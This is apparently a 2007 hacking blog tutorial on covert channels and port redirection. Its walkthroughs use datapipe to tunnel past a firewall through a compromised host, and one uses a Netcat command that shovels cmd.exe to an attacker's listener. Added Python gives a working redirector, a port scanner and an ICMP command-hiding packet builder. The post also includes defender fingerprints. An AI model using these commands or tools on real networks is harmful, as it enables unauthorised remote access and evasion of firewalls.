Saturday, December 8, 2007

Covert Communication Tools

PART 1 INTRODUCTION

The Trusted Computer System Evaluation Criteria (TCSEC, the DoD "Orange Book") was historically one of the first documents to examine the concept of covert channels in depth and to require that evaluated systems identify and limit them.

TCSEC basically divides covert channels into 2 broad categories:-
• Covert timing channels – information is signalled by modulating when something observable happens (how long a shared resource such as the CPU or disk is held, how quickly a request is answered), and the receiving process decodes bits from those delays. Timing channels are difficult to detect because nothing is stored anywhere: the only evidence is a change in the timing of otherwise legitimate activity.
• Covert storage channels – one process writes to a shared storage attribute (a file's existence or size, a lock, a flag, a free-space counter) and a second process, which has no legitimate way to talk to the first, reads it back.

In the world of hacking, covert communication is accomplished through a "covert channel". A covert channel is a way of moving information through a communication channel or protocol in a manner in which it was never intended to be used. For an ethical hacker who performs attack and penetration assessments, such tools are important because real attackers use them to obtain an initial foothold into an otherwise secure network and to keep it. For the network administrator, understanding how these tools work and what fingerprints they leave (odd ICMP payloads, TCP segments that never complete a handshake, a service answering on a port it should not be on) helps in recognising potential entry points into the network. For the naughty hacker, it is a powerful tool that can give him control and access while his traffic looks like something the firewall already allows.

You must be saying: I NEED THE TOOLS, NOT EXPLANATIONS! Hehe, wanna know? Wanna know? Okay, first let me finish the short explanation, then we will get to the tools section. Well, the design of TCP/IP offers many opportunities for misuse. Did you know this? Hehe. The protocols used for covert communications include Internet Protocol (IP), TCP, UDP and ICMP: each of them has header fields and a payload area that the receiving stack accepts without ever checking whether the contents are what the protocol intended.
PART 2 COVERT COMMUNICATION TOOLS

How can a tool such as ping be misused for covert communications? In this part we focus on tools designed to make covert communication easy.

(i) Port Redirection

For a TCP or UDP packet to reach an application, it needs both an IP address and a port number. Ports range from 0 to 65535, and most services use well-known ports: DNS uses 53, whereas HTTP uses 80. Port redirection works by listening on one port and forwarding everything received there to a second host and port. Some of the tools used for port redirection are datapipe, fpipe and Netcat. What is great about all 3 of these tools is that they are protocol ignorant: they don't care what you pass through them. A port redirector simply acts as a pipe that moves bytes from point A to point B, so anything the firewall lets reach point A ends up at point B.

datapipe is a UNIX port redirection tool. Its syntax is straightforward:

datapipe localport remoteport remotehost

It listens on localport and forwards every connection it accepts to remotehost on remoteport.

For example, the naughty hacker has compromised a Linux host (10.2.2.254) on the inside of the network and has uploaded datapipe to it. Now he would like to set up a null session to a Windows system (10.2.2.2) inside the compromised network. The problem is that the firewall blocks port 139, so there is no direct way to set up the null session. That's where datapipe comes in: as long as the firewall still lets port 80 through to 10.2.2.254, the port 139 traffic can ride inside a port 80 connection.
From the compromised Linux system, the hacker runs (note the lower case; commands are case-sensitive on Linux):

datapipe 80 139 10.2.2.2

This listens on port 80 of 10.2.2.254 and hands each connection to 10.2.2.2 on port 139. On his own Linux system, the hacker then enters:

datapipe 139 80 10.2.2.254

This listens on port 139 of his own machine and forwards to 10.2.2.254 on port 80. He now points his null-session client at 127.0.0.1 port 139: the connection leaves on port 80, crosses the firewall, and is handed to 10.2.2.2 on port 139 by the compromised host. On the Windows side the session appears to come from 10.2.2.254, which is one of the fingerprints an administrator can look for.
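To make the two-hop chain above concrete, here is a minimal datapipe-style redirector in Python. It is an added example, not the source of datapipe, fpipe or Netcat; it keeps the text's argument order (localport remoteport remotehost) and, because it never looks at the bytes it copies, it is just as protocol ignorant. The echo server standing in for the Windows box on 10.2.2.2:139, the loopback addresses and the use of port 0 to let the OS pick free ports are constructed for the demo.

```python
"""Minimal datapipe-style TCP port redirector. Added example, not the source
of datapipe, fpipe or Netcat; argument order copies the text's
'datapipe localport remoteport remotehost'."""
import socket
import threading

def _pump(src, dst):
    """Copy bytes from src to dst until src reaches EOF, then half-close dst
    so the far end sees EOF too. The payload is never inspected: that is
    what makes a redirector 'protocol ignorant'."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def _relay(client, remote_host, remote_port):
    """Open the onward connection and pump both directions until both close."""
    try:
        remote = socket.create_connection((remote_host, remote_port), timeout=5)
    except OSError:
        client.close()          # target unreachable: drop the client
        return
    remote.settimeout(None)
    back = threading.Thread(target=_pump, args=(remote, client), daemon=True)
    back.start()
    _pump(client, remote)
    back.join()
    client.close()
    remote.close()

def _echo(conn):
    """Constructed stand-in for the real target (10.2.2.2:139 in the text)."""
    _pump(conn, conn)
    conn.close()

def _serve(bind_addr, port, handler):
    """Accept loop shared by the redirector and the stand-in target.
    Returns (bound_port, stop); port 0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_addr, port))
    srv.listen(16)
    srv.settimeout(0.2)             # wake periodically to notice stop()
    stop_event = threading.Event()

    def loop():
        while not stop_event.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            conn.settimeout(None)   # accepted sockets back to blocking mode
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
        srv.close()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1], stop_event.set

def start_datapipe(local_port, remote_port, remote_host):
    """datapipe localport remoteport remotehost: listen on local_port and
    forward each accepted connection to remote_host:remote_port."""
    return _serve("0.0.0.0", local_port,
                  lambda conn: _relay(conn, remote_host, remote_port))

def start_echo_server():
    """Constructed target for the demo, listening on a free loopback port."""
    return _serve("127.0.0.1", 0, _echo)

def send_through(host, port, payload):
    """Client side: send payload, half-close, collect everything sent back."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)

if __name__ == "__main__":
    # The text's two-hop chain on loopback: first pipe = 'datapipe 80 139
    # 10.2.2.2' on the inside host, second = 'datapipe 139 80 10.2.2.254'.
    target_port, stop_target = start_echo_server()
    inside_port, stop_inside = start_datapipe(0, target_port, "127.0.0.1")
    local_port, stop_local = start_datapipe(0, inside_port, "127.0.0.1")
    print(send_through("127.0.0.1", local_port, b"hello through two pipes"))
    stop_local()
    stop_inside()
    stop_target()
```

The design point worth noticing is in _pump: the half-close (shutdown SHUT_WR) is what lets each hop pass EOF along without killing the other direction early, which is what a real null-session exchange needs. Nothing in the chain cares whether the bytes are SMB, HTTP or anything else.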

Note: Netcat is also useful for port redirection.

For example, if Netcat is available on the victim's system, it can be used in much the same way as datapipe and fpipe. You can even shovel a shell directly back to the hacker's system. First, the hacker sets up a listener on his own system:

nc -n -v -l -p 80

Next, the hacker enters the following command on the victim's system:

nc -n hackers_ip 80 -e cmd.exe

Once entered, this shovels a shell from the victim's system to the hacker's waiting listener: the victim connects outbound to port 80, which most firewalls permit, and attaches cmd.exe to that connection, so whatever the hacker types arrives at the victim's command prompt. The -e option only exists in Netcat builds compiled with it (GAPING_SECURITY_HOLE in the original source), so check the copy on the victim before relying on it. Netcat can be used for many other purposes, such as port scanning and uploading files. To port scan:

nc -v -z -w1 IPaddress 1-1024

This command scans TCP ports 1 through 1024 on the target IP address.

***Meanings of symbols***

-v means verbose
-z means zero-I/O mode, used for port scanning: connect, report the result and send no data
-w1 means wait one second before timing out on each port
1-1024 is the range of TCP ports to be scanned
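The scan above is nothing more than a TCP connect attempt per port with a one-second timeout. The following Python equivalent, an added example rather than Netcat's own code, shows the three outcomes a practitioner should distinguish: the handshake completes (open), the target answers RST (closed), or nothing comes back before -w1 expires (filtered, typically a firewall dropping the SYN). The listener and the released port it scans are constructed on loopback for the demo; the port-spec parser accepts the same 1-1024 style range as the nc command.

```python
"""Connect scanner equivalent to 'nc -v -z -w1 target 1-1024'.
Added example, not Netcat's code."""
import socket
from concurrent.futures import ThreadPoolExecutor

def parse_port_spec(spec):
    """'1-1024,8080' -> [1, 2, ..., 1024, 8080]; rejects anything outside 0-65535."""
    ports = []
    for part in spec.split(","):
        lo, _, hi = part.strip().partition("-")
        lo = int(lo)
        hi = int(hi) if hi else lo
        if not 0 <= lo <= hi <= 65535:
            raise ValueError("bad port spec: %r" % part)
        ports.extend(range(lo, hi + 1))
    return ports

def probe(host, port, timeout=1.0):
    """One TCP connect probe; returns 'open', 'closed' or 'filtered'."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)          # the -w1 part: give up after a second
        try:
            s.connect((host, port))
            return "open"              # handshake completed; like -z, no data is sent
        except ConnectionRefusedError:
            return "closed"            # target replied with RST
        except socket.timeout:
            return "filtered"          # SYN dropped silently, e.g. by a firewall
        except OSError:
            return "filtered"          # unreachable host etc.: nothing useful came back

def scan(host, ports, timeout=1.0, workers=64):
    """Probe many ports concurrently; returns {'open': [...], 'closed': [...],
    'filtered': [...]} with ports in the order given."""
    results = {"open": [], "closed": [], "filtered": []}
    with ThreadPoolExecutor(max_workers=workers) as ex:
        states = ex.map(lambda p: probe(host, p, timeout), ports)
        for port, state in zip(ports, states):
            results[state].append(port)
    return results

def open_listener():
    """Constructed target for the demo: a listening socket on a free port.
    Returns (port, close)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv.getsockname()[1], srv.close

def free_port():
    """A loopback port that nothing listens on (bound, then released)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port

if __name__ == "__main__":
    port, close = open_listener()
    print(scan("127.0.0.1", parse_port_spec("1-1024") + [port], timeout=0.5)["open"])
    close()
```

A connect scan completes the handshake, so every open port it finds produces an accept() on the target and usually a log line: this is the noisy end of port scanning, and the sweep of sequential ports within a second or two is exactly the pattern an IDS signature looks for.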
OTHER REDIRECTION and COVERT TOOLS

The following tools carry their traffic over ICMP, TCP or even IGRP:-
• Loki – the classic Phrack proof of concept that hides data in the data field of ICMP echo request and echo reply packets; it was designed to show how ICMP traffic can be insecure and dangerous, since most filters let ping through unexamined.
• ICMP backdoor – has the advantage of using only ping reply packets, which stateless filters tend to pass so that answers to legitimate outbound pings can get back in.
• 007Shell
• B0CK
• Reverse WWW Tunneling Shell – the compromised host polls the attacker's web server with what looks like ordinary outbound HTTP, so the command channel rides on traffic the firewall already permits.
• AckCmd – a covert channel program that provides a command shell on Windows systems. It communicates using only TCP ACK segments and never completes a normal three-way handshake, so the client component can contact the server component straight through routers whose ACLs block new (SYN) connections but pass anything that looks like established traffic.
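The question asked earlier, how ping can be misused, comes down to the ICMP echo data field: the stack delivers whatever bytes it contains, so Loki and the ICMP backdoor simply put commands there. The example below builds such packets and parses them back, and adds the check a defender would want: does the data field look like what a stock ping emits? It is an added example, not Loki's or the ICMP backdoor's code. Only bytes are constructed, nothing is sent (that would need a raw socket and root). The COVERT_TAG framing is hypothetical, and the two baselines in looks_like_normal_ping (Windows ping's 32-byte alphabet, iputils ping's 8-byte timestamp followed by 0x10, 0x11, ...) are assumptions to replace with patterns captured from your own hosts.

```python
"""Craft and inspect ICMP echo packets carrying a covert payload.
Added example, not Loki's or the ICMP backdoor's code; bytes only, no sending."""
import struct

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8
# Hypothetical marker meaning 'this echo carries a command' (not Loki's framing).
COVERT_TAG = b"CC01"
# Assumed baseline: data field of a default Windows ping (32 bytes).
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"

def icmp_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit big-endian words;
    zero-pads an odd trailing byte."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_echo(icmp_type, ident, seq, data):
    """ICMP header (type, code, checksum, identifier, sequence) + data field."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + data)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + data

def parse_echo(packet):
    """Return (type, ident, seq, data); reject short or corrupted packets."""
    if len(packet) < 8:
        raise ValueError("truncated ICMP packet")
    if icmp_checksum(packet) != 0:          # a valid packet sums to zero
        raise ValueError("bad ICMP checksum")
    icmp_type, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if icmp_type not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY) or code != 0:
        raise ValueError("not an echo request/reply")
    return icmp_type, ident, seq, packet[8:]

def hide_command(command, ident=0x1234, seq=1, reply_only=False):
    """Client side: wrap a command in an echo packet. reply_only=True is the
    ICMP backdoor trick: stateless filters that let replies in so that
    legitimate pings get answered will pass it."""
    icmp_type = ICMP_ECHO_REPLY if reply_only else ICMP_ECHO_REQUEST
    return build_echo(icmp_type, ident, seq, COVERT_TAG + command)

def reveal_command(packet):
    """Server side: the command if the echo carries our tag, else None
    (an ordinary ping is answered normally and ignored)."""
    _, _, _, data = parse_echo(packet)
    if not data.startswith(COVERT_TAG):
        return None
    return data[len(COVERT_TAG):]

def looks_like_normal_ping(data):
    """Defender-side heuristic: does the data field match a stock ping?
    Assumed baselines: the Windows alphabet above, or an 8-byte timestamp
    followed by the byte ramp 0x10, 0x11, ... as iputils ping sends.
    Anything else deserves a look."""
    if data == WINDOWS_PING_DATA:
        return True
    if len(data) >= 16 and all(data[i] == (i + 8) & 0xFF for i in range(8, len(data))):
        return True
    return False

if __name__ == "__main__":
    pkt = hide_command(b"cat /etc/passwd")
    print(pkt.hex())
    print(reveal_command(pkt), looks_like_normal_ping(pkt[8:]))
```

The detection side is the useful half for an administrator: a stock ping has a fixed, boring data field, so echo packets with printable commands, varying payload sizes, or replies that were never preceded by a request are what to alert on, and that holds whether the tool is Loki, the ICMP backdoor or something written last week.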

Note: I have just given a short overview of "Covert Communication Tools". For in-depth knowledge about these tools and how to apply them in a real-life situation, please do a Google search and do your own reading, because it is impossible to explain all the tools in depth here; the explanations are too long.